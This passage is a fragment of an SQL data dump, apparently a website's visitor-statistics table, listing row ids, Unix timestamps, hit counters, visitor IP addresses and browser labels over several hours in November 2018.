,0,'130.180.220.174','chrome'),(336637,1542659237,1,0,1,0,'66.249.66.152',''),(336638,1542659261,1,1,0,0,'8.29.198.25','other'),(336639,1542659397,1,1,0,0,'66.249.66.40','chrome'),(336640,1542659566,1,1,0,0,'93.78.184.53','firefox'),(336641,1542659815,1,1,0,0,'93.76.237.121','msie'),(336642,1542659898,1,1,0,0,'54.36.149.22','other'),(336643,1542659925,1,1,0,0,'188.231.221.45','firefox'),(336644,1542659934,1,1,0,0,'46.229.168.136','other'),(336645,1542659936,1,1,0,0,'46.229.168.134','other'),(336646,1542659978,1,1,0,0,'66.249.66.156','chrome'),(336647,1542660220,1,1,0,0,'54.36.149.29','other'),(336648,1542660236,1,1,0,0,'54.36.149.77','other'),(336649,1542660247,2,2,0,0,'180.163.220.4','chrome'),(336650,1542661178,1,1,0,0,'54.36.149.11','other'),(336651,1542661282,1,1,0,0,'46.229.168.134','other'),(336652,1542661297,1,1,0,0,'66.249.66.156','chrome'),(336653,1542661385,1,1,0,0,'54.36.148.213','other'),(336654,1542661938,2,2,0,0,'157.55.39.192','other'),(336655,1542662067,1,1,0,0,'66.249.66.57','chrome'),(336656,1542662068,1,1,0,0,'66.249.66.42','chrome'),(336657,1542662081,1,1,0,0,'46.229.168.135','other'),(336658,1542662083,1,1,0,0,'46.229.168.152','other'),(336659,1542662117,1,1,0,0,'54.36.148.132','other'),(336660,1542662164,1,1,0,0,'54.36.148.142','other'),(336661,1542662228,1,1,0,0,'54.36.148.28','other'),(336662,1542662236,1,1,0,0,'157.55.39.212','other'),(336663,1542662335,1,1,0,0,'54.36.148.151','other'),(336664,1542662434,1,1,0,0,'54.36.148.184','other'),(336665,1542662746,2,2,0,0,'54.36.148.244','other'),(336666,1542662931,1,1,0,0,'109.86.20.18','chrome'),(336667,1542663016,1,1,0,0,'46.229.168.134','other'),(336668,1542663083,2,2,0,0,'46.229.168.143','other'),(336669,1542663177,1,1,0,0,'54.36.149.68','other'),(336670,1542663215,1,1,0,0,'46.229.168.135','other'),(336671,1542663380,1,1,0,0,'93.78.232.42','firefox'),(336672,1542663401,2,2,0,0,'91.209.11.236','other'),(336673,1542663592,1,1,0,0,'54.36.148.46','other'),(336674,1542663991,1,1,0,0,'54.36.149.98','other'),(336675,1542664089,1,1,0,0,'46.229.168.136','other'),(336676,1542664091,1,1,0,0,'46.229.168.146','other'),(336677,1542664350,1,1,0,0,'46.229.168.137','other'),(336678,1542664353,1,1,0,0,'46.229.168.141','other'),(336679,1542664505,1,1,0,0,'54.36.148.20','other'),(336680,1542664722,1,1,0,0,'54.36.148.68','other'),(336681,1542664940,1,1,0,0,'54.36.148.115','other'),(336682,1542664950,1,1,0,0,'66.249.66.156','chrome'),(336683,1542665024,1,1,0,0,'54.36.148.136','other'),(336684,1542665028,1,1,0,0,'54.36.148.46','other'),(336685,1542665671,2,2,0,0,'66.249.66.155','chrome'),(336686,1542665672,2,2,0,0,'66.249.66.154','chrome'),(336687,1542665687,2,2,0,0,'157.55.39.192','other'),(336688,1542665816,1,1,0,0,'54.36.148.141','other'),(336689,1542665989,1,1,0,0,'54.36.149.52','other'),(336690,1542666140,1,1,0,0,'54.36.148.199','other'),(336691,1542666428,1,1,0,0,'54.36.148.15','other'),(336692,1542666482,1,1,0,0,'66.249.66.42','chrome'),(336693,1542666636,1,1,0,0,'54.36.148.117','other'),(336694,1542666670,1,1,0,0,'66.249.66.156','chrome'),(336695,1542666671,2,2,0,0,'66.249.66.154','chrome'),(336696,1542666711,1,1,0,0,'54.36.149.75','other'),(336697,1542666712,1,1,0,0,'66.249.66.152','chrome'),(336698,1542667170,1,1,0,0,'66.249.66.40','chrome'),(336699,1542667427,1,1,0,0,'54.36.148.207','other'),(336700,1542667561,1,1,0,0,'46.229.168.135','other'),(336701,1542667563,1,1,0,0,'46.229.168.138','other'),(336702,1542667604,1,1,0,0,'54.36.148.28','other'),(336703,1542667867,1,1,0,0,'54.36.149.43','other'),(336704,1542667899,1,1,0,0,'54.36.148.176','other'),(336705,1542667939,1,1,0,0,'54.36.148.78','other'),(336706,1542667966,1,1,0,0,'8.29.198.25','other'),(336707,1542668050,1,1,0,0,'46.229.168.140','other'),(336708,1542668052,1,1,0,0,'46.229.168.147','other'),(336709,1542668107,8,8,0,0,'178.154.244.29','other'),(336710,1542668144,1,1,0,0,'157.55.39.212','other'),(336711,1542668177,1,1,0,0,'46.229.168.133','other'),(336712,1542668181,2,2,0,0,'46.229.168.143','other'),(336713,1542668389,1,1,0,0,'46.229.168.134','other'),(336714,1542668404,1,1,0,0,'46.229.168.146','other'),(336715,1542668481,2,2,0,0,'178.154.244.11','other'),(336716,1542668966,1,1,0,0,'54.36.148.187','other'),(336717,1542669095,5,5,0,0,'178.154.244.29','other'),(336718,1542669383,2,2,0,0,'178.154.244.11','other'),(336719,1542669437,1,1,0,0,'8.29.198.25','other'),(336720,1542669535,1,1,0,0,'46.229.168.138','other'),(336721,1542669638,1,1,0,0,'66.249.66.156','chrome'),(336722,1542669646,2,2,0,0,'66.249.66.152','chrome'),(336723,1542669730,1,1,0,0,'54.36.148.186','other'),(336724,1542669979,1,1,0,0,'66.249.66.155','chrome'),(336725,1542669980,1,1,0,0,'66.249.66.154','chrome'),(336726,1542670048,1,1,0,0,'54.36.148.70','other'),(336727,1542670060,1,1,0,0,'37.9.113.103','other'),(336728,1542670106,1,1,0,0,'8.29.198.26','other'),(336729,1542670118,9,9,0,0,'178.154.244.29','other'),(336730,1542670163,1,1,0,0,'54.36.149.82','other'),(336731,1542670184,1,1,0,0,'5.45.207.79','other'),(336732,1542670427,1,1,0,0,'37.9.113.148','other'),(336733,1542671026,1,1,0,0,'178.154.244.11','other'),(336734,1542671172,1,1,0,0,'46.229.168.139','other'),(336735,1542671185,4,4,0,0,'178.154.244.29','other'),(336736,1542671291,1,1,0,0,'128.74.245.129','msie'),(336737,1542671422,1,1,0,0,'54.36.148.151','other'),(336738,1542671519,1,1,0,0,'54.36.149.36','other'),(336739,1542671725,1,1,0,0,'31.130.6.187','chrome'),(336740,1542671801,1,1,0,0,'54.36.148.171','other'),(336741,1542671886,1,1,0,0,'54.36.148.213','other'),(336742,1542672028,1,1,0,0,'46.219.227.251','chrome'),(336743,1542672163,1,1,0,0,'54.36.148.196','other'),(336744,1542672329,1,1,0,0,'54.36.148.91','other'),(336745,1542672474,1,1,0,0,'46.229.168.140','other'),(336746,1542672477,1,1,0,0,'46.229.168.149','other'),(336747,1542672572,1,1,0,0,'54.36.148.190','other'),(336748,1542672704,1,1,0,0,'54.36.148.99','other'),(336749,1542672714,1,1,0,0,'54.36.148.52','other'),(336750,1542672746,1,1,0,0,'54.36.148.31','other'),(336751,1542673452,1,1,0,0,'54.36.148.68','other'),(336752,1542673549,1,1,0,0,'46.229.168.148','other'),(336753,1542673809,1,1,0,0,'188.163.26.26','msie'),(336754,1542673846,1,1,0,0,'66.249.66.156','chrome'),(336755,1542673957,1,1,0,0,'46.229.168.138','other'),(336756,1542673960,1,1,0,0,'46.229.168.149','other'),(336757,1542674043,1,1,0,0,'46.229.168.142','other'),(336758,1542674127,1,1,0,0,'54.36.148.215','other'),(336759,1542674395,1,1,0,0,'54.36.148.39','other'),(336760,1542674512,1,1,0,0,'54.36.148.27','other'),(336761,1542674522,2,2,0,0,'178.154.244.29','other'),(336762,1542674580,1,1,0,0,'54.36.149.7','other'),(336763,1542674603,1,1,0,0,'54.36.148.237','other'),(336764,1542674632,1,1,0,0,'54.36.148.216','other'),(336765,1542674866,1,1,0,0,'46.229.168.138','other'),(336766,1542674868,1,1,0,0,'46.229.168.132','other'),(336767,1542675651,1,1,0,0,'54.36.148.188','other'),(336768,1542675782,3,3,0,0,'66.249.66.152','chrome'),(336769,1542675826,1,1,0,0,'54.36.148.173','other'),(336770,1542675857,1,1,0,0,'46.229.168.136','other'),(336771,1542675930,1,1,0,0,'157.55.39.212','other'),(336772,1542676090,1,1,0,0,'54.36.148.211','other'),(336773,1542676144,1,1,0,0,'66.249.66.154','chrome'),(336774,1542676228,1,1,0,0,'46.229.168.153','other'),(336775,1542676286,1,1,0,0,'54.36.148.21','other'),(336776,1542676350,1,1,0,0,'46.229.168.129','other'),(336777,1542676354,1,1,0,0,'46.229.168.149','other'),(336778,1542676447,1,1,0,0,'178.154.244.11','other'),(336779,1542676535,1,1,0,0,'54.36.148.223','other'),(336780,1542676587,1,1,0,0,'66.249.66.155','chrome'),(336781,1542676614,1,1,0,0,'54.36.148.174','other'),(336782,1542676622,1,1,0,0,'46.229.168.135','other'),(336783,1542676624,1,1,0,0,'46.229.168.152','other'),(336784,1542676940,1,1,0,0,'54.36.148.120','other'),(336785,1542677164,1,1,0,0,'54.36.148.97','other'),(336786,1542677352,1,1,0,0,'54.36.148.224','other'),(336787,1542677483,1,1,0,0,'54.36.148.55','other'),(336788,1542677998,1,1,0,0,'54.36.148.198','other'),(336789,1542678170,1,1,0,0,'54.36.149.93','other'),(336790,1542678283,1,1,0,0,'54.36.148.154','other'),(336791,1542678298,1,1,0,0,'5.45.207.19','other'),(336792,1542678414,1,1,0,0,'54.36.148.98','other'),(336793,1542678486,1,1,0,0,'54.36.148.76','other'),(336794,1542678622,1,1,0,0,'54.36.148.182','other'),(336795,1542678775,1,1,0,0,'54.36.148.191','other'),(336796,1542678798,1,1,0,0,'8.29.198.25','other'),(336797,1542679507,1,1,0,0,'54.36.148.103','other'),(336798,1542679643,1,1,0,0,'54.36.148.253','other'),(336799,1542679798,1,1,0,0,'46.229.168.136','other'),(336800,1542680080,1,1,0,0,'54.36.148.87','other'),(336801,1542680109,1,1,0,0,'54.36.148.145','other'),(336802,1542680120,1,1,0,0,'54.36.148.226','other'),(336803,1542680156,1,1,0,0,'54.36.148.173','other'),(336804,1542680194,1,1,0,0,'54.36.148.228','other'),(336805,1542680271,1,1,0,0,'66.249.66.59','chrome'),(336806,1542680272,1,1,0,0,'66.249.66.44','chrome'),(336807,1542680284,2,2,0,0,'8.29.198.26','other'),(336808,1542680323,1,1,0,0,'54.36.148.158','other'),(336809,1542680371,1,1,0,0,'178.154.244.11','other'),(336810,1542680544,1,1,0,0,'54.36.148.52','other'),(336811,1542680643,1,1,0,0,'157.55.39.222','other'),(336812,1542680828,1,1,0,0,'66.249.66.156','chrome'),(336813,1542681574,1,1,0,0,'46.229.168.143','other'),(336814,1542681721,1,1,0,0,'66.249.66.154','chrome'),(336815,1542681933,1,1,0,0,'157.55.39.192','other'),(336816,1542682404,2,2,0,0,'54.36.149.86','other'),(336817,1542682868,1,1,0,0,'54.36.148.244','other'),(336818,1542682935,1,1,0,0,'54.36.148.37','other'),(336819,1542682977,1,1,0,0,'66.249.66.42','chrome'),(336820,1542683137,1,1,0,0,'207.46.13.172','other'),(336821,1542683194,1,1,0,0,'54.36.148.33','other'),(336822,1542683347,1,1,0,0,'54.36.148.234','other'),(336823,1542683529,1,1,0,0,'46.229.168.133','other'),(336824,1542683532,1,1,0,0,'46.229.168.139','other'),(336825,1542684049,1,1,0,0,'54.36.149.73','other'),(336826,1542684452,1,1,0,0,'54.36.148.98','other'),(336827,1542684500,1,1,0,0,'66.249.66.156','chrome'),(336828,1542684645,1,1,0,0,'54.36.148.218','other'),(336829,1542684736,1,1,0,0,'66.249.66.154','chrome'),(336830,1542684757,1,1,0,0,'54.36.148.221','other'),(336831,1542684788,1,1,0,0,'54.36.148.241','other'),(336832,1542684807,1,1,0,0,'46.229.168.150','other'),(336833,1542684810,1,1,0,0,'46.229.168.149','other'),(336834,1542684834,1,1,0,0,'54.36.149.14','other'),(336835,1542685003,1,1,0,0,'54.36.148.178','other'),(336836,1542685284,1,1,0,0,'54.36.148.32','other'),(336837,1542685404,1,1,0,0,'54.36.148.138','other'),(336838,1542685416,1,1,0,0,'54.36.148.202','other'),(336839,1542685642,1,1,0,0,'54.36.148.250','other'),(336840,1542685922,1,1,0,0,'46.229.168.145','other'),(336841,1542686211,1,1,0,0,'54.36.149.90','other'),(336842,1542686415,1,1,0,0,'46.229.168.143','other'),(336843,1542686417,1,1,0,0,'46.229.168.133','other'),(336844,1542686730,1,1,0,0,'54.36.149.100','other'),(336845,1542686771,1,1,0,0,'66.249.66.154','chrome'),(336846,1542686796,1,1,0,0,'54.36.148.248','other'),(336847,1542687085,1,1,0,0,'54.36.148.231','other'),(336848,1542687164,1,1,0,0,'66.249.66.42','chrome'),(336849,1542687622,1,1,0,0,'54.36.149.103','other'),(336850,1542687638,2,2,0,0,'66.249.66.156','chrome'),(336851,1542687763,1,1,0,0,'40.77.167.152','other'),(336852,1542687880,1,1,0,0,'54.36.149.82','other'),(336853,1542688021,1,1,0,0,'46.229.168.149','other'),(336854,1542688079,1,1,0,0,'54.36.148.24','other'),(336855,1542688607,2,2,0,0,'46.229.168.145','other'),(336856,1542688690,1,1,0,0,'54.36.148.124','other'),(336857,1542688938,1,1,0,0,'54.36.148.94','other'),(336858,1542689159,4,4,0,0,'178.154.244.29','other'),(336859,1542689187,1,1,0,0,'66.249.81.195','chrome'),(336860,1542689208,1,1,0,0,'46.211.49.8','chrome'),(336861,1542689406,1,1,0,0,'54.36.148.88','other'),(336862,1542689449,1,1,0,0,'54.36.148.13','other'),(336863,1542689490,1,1,0,0,'66.249.66.40','chrome'),(336864,1542689626,1,1,0,0,'8.29.198.27','other'),(336865,1542689852,3,3,0,0,'178.154.244.11','other'),(336866,1542690153,1,1,0,0,'66.249.66.152','chrome'),(336867,1542690388,1,1,0,0,'54.36.149.39','other'),(336868,1542690479,1,1,0,0,'5.45.207.19','other'),(336869,1542690610,1,1,0,0,'54.36.149.105','other'),(336870,1542690702,7,7,0,0,'178.154.244.29','other'),(336871,1542690729,1,1,0,0,'54.36.149.26','other'),(336872,1542690903,3,3,0,0,'178.154.244.11','other'),(336873,1542691126,1,1,0,0,'8.29.198.25','other'),(336874,1542691218,1,1,0,0,'66.249.66.154','chrome'),(336875,1542691452,1,1,0,0,'54.36.148.219','other'),(336876,1542691464,1,1,0,0,'54.36.148.44','other'),(336877,1542691711,5,5,0,0,'178.154.244.29','other'),(336878,1542691775,1,1,0,0,'66.249.66.61','chrome'),(336879,1542691777,1,1,0,0,'66.249.66.40','chrome'),(336880,1542691788,1,1,0,0,'8.29.198.27','other'),(336881,1542691909,8,8,0,0,'178.154.244.11','other'),(336882,1542692043,1,1,0,0,'54.36.149.11','other'),(336883,1542692079,1,1,0,0,'46.229.168.140','other'),(336884,1542692201,1,1,0,0,'54.36.148.91','other'),(336885,1542692266,1,1,0,0,'54.36.148.47','other'),(336886,1542692270,1,1,0,0,'54.36.148.81','other'),(336887,1542692403,1,1,0,0,'40.77.167.112','other'),(336888,1542692627,3,3,0,0,'178.154.244.29','other'),(336889,1542692805,1,0,1,0,'66.249.66.44',''),(336890,1542692890,1,1,0,0,'54.36.148.118','other'),(336891,1542692932,1,1,0,0,'54.36.149.1','other'),(336892,1542693217,1,1,0,0,'54.36.148.88','other'),(336893,1542693283,1,1,0,0,'54.36.148.248','other'),(336894,1542693594,1,1,0,0,'54.36.148.160','other'),(336895,1542693825,1,1,0,0,'54.36.148.61','other'),(336896,1542694044,2,2,0,0,'178.154.244.11','other'),(336897,1542694081,2,2,0,0,'178.154.244.29','other'),(336898,1542694084,9,9,0,0,'78.30.221.72','chrome'),(336899,1542694667,1,1,0,0,'66.249.66.155','chrome'),(336901,1542694762,1,1,0,0,'54.36.148.70','other'),(336902,1542694929,1,1,0,0,'66.249.66.59','chrome'),(336903,1542694930,1,1,0,0,'66.249.66.40','chrome'),(336904,1542695528,1,1,0,0,'54.36.148.198','other'),(336905,1542695991,2,2,0,0,'195.245.221.5','other'),(336906,1542696059,1,1,0,0,'40.77.167.54','other'),(336907,1542696213,1,1,0,0,'54.36.148.144','other'),(336908,1542696225,1,1,0,0,'54.36.148.167','other'),(336909,1542696368,1,1,0,0,'46.229.168.147','other'),(336910,1542696748,1,1,0,0,'54.36.148.113','other'),(336911,1542696827,1,1,0,0,'54.36.148.112','other'),(336912,1542696984,1,1,0,0,'54.36.149.81','other'),(336913,1542697574,1,1,0,0,'54.36.148.143','other'),(336914,1542697624,1,1,0,0,'54.36.148.175','other'),(336915,1542697751,1,1,0,0,'91.196.178.132','chrome'),(336916,1542697931,1,0,1,0,'66.249.66.154',''),(336917,1542697974,1,1,0,0,'54.36.149.19','other'),(336918,1542698018,2,2,0,0,'91.196.178.93','chrome'),(336919,1542698991,1,1,0,0,'46.229.168.143','other'),(336920,1542698995,1,1,0,0,'46.229.168.140','other'),(336921,1542699093,1,1,0,0,'54.36.148.51','other'),(336922,1542699205,1,1,0,0,'91.196.178.132','chrome'),(336923,1542699253,1,1,0,0,'54.36.149.40','other'),(336924,1542699259,1,1,0,0,'54.36.148.183','other'),(336925,1542699282,1,1,0,0,'54.36.148.237','other'),(336926,1542699358,1,1,0,0,'91.196.178.93','chrome'),(336927,1542699439,1,1,0,0,'54.36.148.120','other'),(336928,1542699473,1,1,0,0,'54.36.149.101','other'),(336929,1542699741,1,1,0,0,'54.36.149.98','other'),(336930,1542699827,1,1,0,0,'66.249.66.156','chrome'),(336931,1542700000,1,1,0,0,'188.163.114.198','chrome'),(336932,1542700037,1,1,0,0,'54.36.148.251','other'),(336933,1542700131,1,1,0,0,'40.77.167.139','other'),(336934,1542700173,1,0,1,0,'66.249.66.152',''),(336935,1542700353,1,0,1,0,'66.249.66.40',''),(336936,1542700424,2,2,0,0,'91.196.178.93','chrome'),(336937,1542700474,1,1,0,0,'8.29.198.27','other'),(336938,1542700697,1,1,0,0,'54.36.148.213','other'),(336939,1542700959,1,1,0,0,'54.36.149.102','other'),(336940,1542701075,1,1,0,0,'91.196.178.132','chrome'),(336941,1542701284,1,1,0,0,'188.163.114.198','chrome'),(336942,1542701383,1,1,0,0,'66.249.66.61','chrome'),(336943,1542701384,1,1,0,0,'66.249.66.40','chrome'),(336944,1542701865,1,1,0,0,'54.36.148.225','other'),(336945,1542701975,2,2,0,0,'8.29.198.25','other'),(336946,1542702009,1,1,0,0,'46.229.168.141','other'),(336947,1542702238,1,1,0,0,'54.36.149.51','other'),(336948,1542702464,1,1,0,0,'66.249.66.61','chrome'),(336949,1542702465,2,2,0,0,'66.249.66.42','chrome'),(336950,1542702588,1,1,0,0,'54.36.148.89','other'),(336951,1542702650,1,1,0,0,'54.36.148.14','other'),(336952,1542702684,1,1,0,0,'54.36.148.122','other'),(336953,1542702726,2,2,0,0,'40.77.167.54','other'),(336954,1542702844,1,1,0,0,'46.229.168.147','other'),(336955,1542703035,1,1,0,0,'54.36.149.91','other'),(336956,1542703359,1,1,0,0,'46.229.168.133','other'),(336957,1542703432,2,2,0,0,'91.196.177.46','firefox'),(336958,1542703667,1,1,0,0,'54.36.148.11','other'),(336959,1542703748,4,4,0,0,'91.196.178.93','chrome'),(336960,1542703966,1,1,0,0,'91.196.178.132','chrome'),(336961,1542704000,2,2,0,0,'46.229.168.130','other'),(336962,1542704106,1,1,0,0,'46.229.168.143','other'),(336963,1542704116,1,1,0,0,'37.54.141.229','firefox'),(336964,1542704165,1,1,0,0,'54.36.148.100','other'),(336965,1542704219,1,1,0,0,'66.249.66.61','chrome'),(336966,1542704220,1,1,0,0,'66.249.66.42','chrome'),(336967,1542704239,1,1,0,0,'54.36.149.74','other'),(336968,1542704658,1,1,0,0,'54.36.149.90','other'),(336969,1542704794,1,1,0,0,'54.36.148.142','other'),(336970,1542705080,2,2,0,0,'91.124.182.170','firefox'),(336971,1542705110,1,1,0,0,'66.249.66.156','chrome'),(336972,1542705370,1,1,0,0,'95.67.111.22','chrome'),(336973,1542705416,1,1,0,0,'91.196.179.138','chrome'),(336974,1542705521,1,1,0,0,'46.229.168.130','other'),(336975,1542705524,1,1,0,0,'46.229.168.135','other'),(336976,1542705553,1,1,0,0,'54.36.148.80','other'),(336977,1542705667,1,1,0,0,'54.36.148.85','other'),(336978,1542705751,1,1,0,0,'54.36.149.0','other'),(336979,1542706544,1,1,0,0,'66.249.66.156','chrome'),(336980,1542706601,1,1,0,0,'66.249.66.154','chrome'),(336981,1542706644,1,1,0,0,'54.36.149.83','other'),(336983,1542706677,1,1,0,0,'46.229.168.129','other'),(336984,1542706808,1,1,0,0,'54.36.149.87','other'),(336985,1542706838,1,1,0,0,'54.36.148.171','other'),(336986,1542706861,1,1,0,0,'207.46.13.172','other'),(336987,1542707117,1,1,0,0,'54.36.149.84','other'),(336988,1542707287,1,1,0,0,'192.198.102.158','other'),(336989,1542707300,1,1,0,0,'54.36.148.167','other'),(336990,1542707401,2,2,0,0,'91.196.178.135','firefox'),(336991,1542707729,1,1,0,0,'87.250.224.47','other'),(336992,1542707741,1,1,0,0,'141.8.142.81','other'),(336993,1542707751,2,2,0,0,'213.180.203.61','other'),(336994,1542707802,1,1,0,0,'54.36.148.133','other'),(336995,1542707873,1,1,0,0,'213.180.203.53','other'),(336996,1542707960,2,2,0,0,'141.8.183.22','other'),(336997,1542707964,1,1,0,0,'5.255.253.25','other'),(336998,1542708099,1,1,0,0,'95.108.213.4','other'),(336999,1542708371,1,1,0,0,'54.36.148.67','other'),(337000,1542708443,3,3,0,0,'178.154.244.11','other'),(337001,1542708501,1,1,0,0,'66.249.66.156','chrome'),(337002,1542708605,1,1,0,0,'54.36.148.141','other'),(337003,1542708641,1,1,0,0,'66.249.66.155','chrome'),(337005,1542708761,1,1,0,0,'91.196.178.93','chrome'),(337006,1542708907,7,7,0,0,'178.154.244.29','other'),(337007,1542708960,2,2,0,0,'91.196.178.67','firefox'),(337008,1542709067,1,1,0,0,'54.36.148.91','other'),(337009,1542709126,1,1,0,0,'54.36.149.33','other'),(337010,1542709219,1,1,0,0,'54.36.149.66','other'),(337011,1542709249,1,1,0,0,'178.154.171.24','other'),(337012,1542709435,1,1,0,0,'54.36.149.93','other'),(337013,1542709524,1,1,0,0,'54.36.148.101','other'),(337014,1542709638,1,1,0,0,'95.163.255.64','other'),(337015,1542709640,1,1,0,0,'95.163.255.68','other'),(337016,1542709646,1,1,0,0,'54.36.150.153','other'),(337017,1542709678,1,1,0,0,'141.8.142.108','other'),(337018,1542709680,4,4,0,0,'178.154.244.11','other'),(337019,1542709704,1,1,0,0,'54.36.149.28','other'),(337020,1542709919,2,2,0,0,'91.196.178.67','firefox'),(337021,1542710041,3,3,0,0,'66.249.66.156','chrome'),(337022,1542710042,1,1,0,0,'66.249.66.152','chrome'),(337023,1542710197,1,1,0,0,'66.249.66.61','chrome'),(337024,1542710198,4,4,0,0,'66.249.66.42','chrome'),(337025,1542710205,2,2,0,0,'66.249.66.57','chrome'),(337026,1542710223,1,1,0,0,'54.36.149.35','other'),(337027,1542710276,1,1,0,0,'54.36.149.107','other'),(337028,1542710291,1,1,0,0,'213.180.203.23','other'),(337029,1542710295,1,1,0,0,'178.154.244.21','other'),(337030,1542710307,2,2,0,0,'95.108.181.94','other'),(337031,1542710311,2,2,0,0,'37.9.113.38','other'),(337032,1542710313,1,1,0,0,'54.36.149.29','other'),(337033,1542710369,2,2,0,0,'66.249.66.59','chrome'),(337034,1542710385,1,1,0,0,'213.180.203.53','other'),(337035,1542710410,1,1,0,0,'66.249.66.40','chrome'),(337036,1542710468,1,1,0,0,'31.43.31.193','firefox'),(337037,1542710471,1,1,0,0,'141.8.142.191','other'),(337038,1542710474,1,1,0,0,'141.8.142.81','other'),(337039,1542710475,1,1,0,0,'5.255.253.16','other'),(337040,1542710477,1,1,0,0,'141.8.183.11','other'),(337041,1542710478,1,1,0,0,'5.45.207.76','other'),(337042,1542710479,1,1,0,0,'87.250.224.118','other'),(337043,1542710722,1,1,0,0,'54.36.149.23','other'),(337044,1542710941,2,2,0,0,'91.196.178.67','firefox'),(337045,1542711065,1,1,0,0,'66.249.66.155','chrome'),(337047,1542711099,1,1,0,0,'46.229.168.149','other'),(337048,1542711105,1,1,0,0,'46.229.168.145','other'),(337049,1542711209,1,1,0,0,'93.78.184.104','firefox'),(337050,1542711241,1,1,0,0,'46.211.149.252','chrome'),(337051,1542711304,1,1,0,0,'8.29.198.27','other'),(337052,1542711494,1,1,0,0,'54.36.149.18','other'),(337053,1542711729,1,1,0,0,'66.249.66.154','chrome'),(337054,1542711735,1,1,0,0,'54.36.148.204','other'),(337055,1542711737,1,1,0,0,'5.255.253.22','other'),(337056,1542712248,1,1,0,0,'54.36.148.82','other'),(337057,1542712465,1,1,0,0,'54.36.148.250','other'),(337058,1542712498,1,1,0,0,'66.249.66.157','chrome'),(337059,1542712499,1,1,0,0,'66.249.66.156','chrome'),(337060,1542712670,1,0,1,0,'66.249.66.59',''),(337061,1542712816,1,1,0,0,'8.29.198.27','other'),(337062,1542712884,1,1,0,0,'54.36.148.228','other'),(337064,1542712948,1,1,0,0,'5.45.207.79','other'),(337065,1542713495,1,1,0,0,'8.29.198.26','other'),(337066,1542713793,1,1,0,0,'46.229.168.151','other'),(337067,1542713854,1,1,0,0,'46.229.168.150','other'),(337068,1542714024,1,1,0,0,'54.36.148.218','other'),(337069,1542714292,1,1,0,0,'178.154.244.29','other'),(337070,1542714435,1,1,0,0,'54.36.149.66','other'),(337071,1542714502,1,1,0,0,'40.77.167.54','other'),(337072,1542714675,1,1,0,0,'54.36.148.255','other'),(337073,1542714726,1,1,0,0,'54.36.148.140','other'),(337074,1542714899,1,1,0,0,'66.249.66.152','chrome'),(337075,1542714964,1,1,0,0,'54.36.148.244','other'),(337076,1542715118,1,1,0,0,'54.36.148.224','other'),(337077,1542715171,1,1,0,0,'54.36.148.135','other'),(337078,1542715234,1,1,0,0,'54.36.148.20','other'),(337079,1542715374,1,1,0,0,'54.36.148.206','other'),(337080,1542715575,1,1,0,0,'54.36.149.59','other'),(337081,1542715759,2,2,0,0,'66.249.66.61','chrome'),(337082,1542715760,2,2,0,0,'66.249.66.42','chrome'),(337083,1542715783,2,2,0,0,'66.249.66.156','chrome'),(337084,1542715784,1,1,0,0,'66.249.66.154','chrome'),(337085,1542715801,1,1,0,0,'54.36.149.39','other'),(337086,1542715845,1,1,0,0,'54.36.148.11','other'),(337087,1542715900,2,2,0,0,'66.249.66.152','chrome'),(337088,1542716194,1,1,0,0,'54.36.148.66','other'),(337089,1542716333,1,1,0,0,'40.77.167.54','other'),(337090,1542716389,1,1,0,0,'66.249.66.155','chrome'),(337091,1542716454,1,1,0,0,'176.105.206.4','chrome'),(337092,1542716534,1,1,0,0,'178.154.244.11','other'),(337093,1542716748,1,1,0,0,'54.36.148.69','other'),(337094,1542717053,1,1,0,0,'66.249.66.61','chrome'),(337096,1542717096,1,1,0,0,'54.36.148.31','other'),(337097,1542717266,1,1,0,0,'46.229.168.133','other'),(337098,1542717270,1,1,0,0,'46.229.168.146','other'),(337099,1542717299,1,1,0,0,'213.174.6.41','chrome'),(337100,1542717465,1,1,0,0,'46.229.168.150','other'),(337101,1542717617,1,1,0,0,'207.46.13.98','other'),(337102,1542718361,1,1,0,0,'5.45.207.19','other'),(337103,1542718480,1,1,0,0,'54.36.148.131','other'),(337104,1542718609,1,1,0,0,'66.249.66.155','chrome'),(337105,1542718670,1,1,0,0,'178.154.244.29','other'),(337106,1542718715,1,1,0,0,'46.229.168.145','other'),(337107,1542718733,1,1,0,0,'46.211.124.124','chrome'),(337108,1542718741,1,1,0,0,'46.229.168.152','other'),(337109,1542718765,1,1,0,0,'46.229.168.151','other'),(337110,1542718767,2,2,0,0,'46.229.168.140','other'),(337111,1542719117,1,1,0,0,'54.36.149.35','other'),(337112,1542719379,1,1,0,0,'66.249.66.156','chrome'),(337113,1542719380,1,1,0,0,'66.249.66.152','chrome'),(337114,1542719407,1,1,0,0,'92.113.9.143','chrome'),(337115,1542719546,1,1,0,0,'46.229.168.147','other'),(337116,1542719594,2,2,0,0,'91.196.178.93','chrome'),(337117,1542719604,2,2,0,0,'207.46.13.98','other'),(337118,1542719798,1,1,0,0,'54.36.148.86','other'),(337119,1542720105,1,1,0,0,'94.178.12.177','firefox'),(337120,1542720416,1,1,0,0,'54.36.148.115','other'),(337121,1542720562,1,1,0,0,'54.36.148.140','other'),(337122,1542720622,1,1,0,0,'46.211.124.124','chrome'),(337123,1542720650,1,1,0,0,'54.36.149.29','other'),(337124,1542720680,1,1,0,0,'46.229.168.137','other'),(337125,1542720683,1,1,0,0,'207.46.13.98','other'),(337126,1542720684,1,1,0,0,'46.229.168.135','other'),(337127,1542720839,2,2,0,0,'109.207.206.163','firefox'),(337128,1542720910,1,1,0,0,'54.36.148.234','other'),(337129,1542720917,1,1,0,0,'95.163.255.94','other'),(337130,1542720921,1,1,0,0,'95.163.255.96','other'),(337131,1542720952,1,1,0,0,'157.55.39.168','other'),(337132,1542721017,1,1,0,0,'54.36.148.71','other'),(337133,1542721255,3,3,0,0,'91.196.178.88','chrome'),(337134,1542721268,1,1,0,0,'54.36.148.196','other'),(337135,1542721513,2,2,0,0,'207.46.13.172','other'),(337136,1542721520,1,1,0,0,'54.36.148.175','other'),(337137,1542721907,3,3,0,0,'40.77.167.216','other'),(337138,1542722138,1,1,0,0,'8.29.198.26','other'),(337139,1542722410,1,1,0,0,'54.36.148.171','other'),(337140,1542722723,1,1,0,0,'54.36.148.147','other'),(337141,1542722744,1,1,0,0,'91.196.178.102','chrome'),(337142,1542723008,1,1,0,0,'217.69.143.62','other'),(337143,1542723088,1,1,0,0,'217.69.143.71','other'),(337144,1542723181,1,1,0,0,'66.249.66.155','chrome'),(337146,1542723184,1,1,0,0,'137.74.0.145','other'),(337147,1542723440,2,2,0,0,'91.196.178.82','firefox'),(337148,1542723442,1,1,0,0,'5.58.64.186','opera'),(337149,1542723591,1,1,0,0,'157.55.39.168','other'),(337150,1542723606,1,1,0,0,'54.36.148.249','other'),(337151,1542723671,1,1,0,0,'54.36.149.95','other'),(337152,1542723713,1,1,0,0,